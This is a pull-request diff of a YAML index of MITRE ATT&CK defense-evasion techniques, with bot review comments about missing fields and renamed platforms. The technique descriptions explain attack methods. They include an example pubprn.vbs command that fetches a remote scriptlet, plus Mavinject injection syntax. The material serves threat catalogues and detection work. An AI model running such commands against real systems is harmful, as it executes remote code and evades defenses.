+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
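Review bot: this hunk drops `x_mitre_permissions_required: [root]` for T1556.003 without a replacement, alongside adding `revoked: false` and `x_mitre_deprecated: false`. The same field survives as context on T1578.004 (`User`) and T1600 (`Administrator`) further down, so the file is now inconsistent across entries; any consumer of this index that filters on `x_mitre_permissions_required` will silently lose this technique, which deserves a mention in the PR description.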
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
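Review bot: the new T1666 entry ends with `atomic_tests: []` and no `identifier:` key, whereas T1006 immediately above carries `identifier: T1006`; other entries in this file (T1027.011, T1578.004) also go without, so the key appears to be emitted only for techniques that have an atomic test file. If that is the convention, fine; if `identifier` is meant to be present for every technique, T1666 is missing it. Also note that `x_mitre_detection: ''` is an empty string upstream for T1666, so anything rendering detection guidance from this index must tolerate an empty value rather than a missing key.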
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
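Review bot: this hunk replaces the `Office 365` and `Google Workspace` platforms on T1564.008 with a single `Office Suite` entry (the same change appears on T1564 further down). Any per-platform index derived from `x_mitre_platforms`, for example one keyed on `Google Workspace`, must be regenerated from the same bundle, otherwise techniques whose only matching platform was `Google Workspace` silently drop out of that index; please confirm the per-platform CSV indexes in this PR were built from the same data.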
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
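Review bot: for T1600 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are deleted with no replacement `x_mitre_attack_spec_version` line, unlike T1036.005 above where the field is bumped to 3.2.0. After this change T1600 (and likewise T1562.009, T1542.005, T1070.002, T1218.004, T1600.001 and T1055.003 further down) carries no attack spec version at all; if that key is read anywhere, these entries will be missing it. Please confirm that is how the upstream objects look and not a generator omission.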
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
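Review bot: the platform rename from `Office 365` to `Office Suite` (with `x_mitre_version` 1.2 → 1.3) changes the value that the per-platform index files under `atomics/Indexes/Indexes-CSV/` are keyed on. Check that the index for the old platform name is regenerated or retired and that the new name gets its own index, otherwise T1564 silently drops out of the Office-related index without any line in this diff showing it.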
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
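Review bot: `Azure AD` and `SaaS` are collapsed into the single platform `Identity Provider` for T1484.002 (version 2.0 → 2.1). Same concern as the `Office Suite` rename above: any index or filter keyed on the `Azure AD` or `SaaS` platform names needs regenerating, and a line in the PR description saying these platform renames come from the upstream ATT&CK bundle rather than a local edit would save the next reviewer from checking.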
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
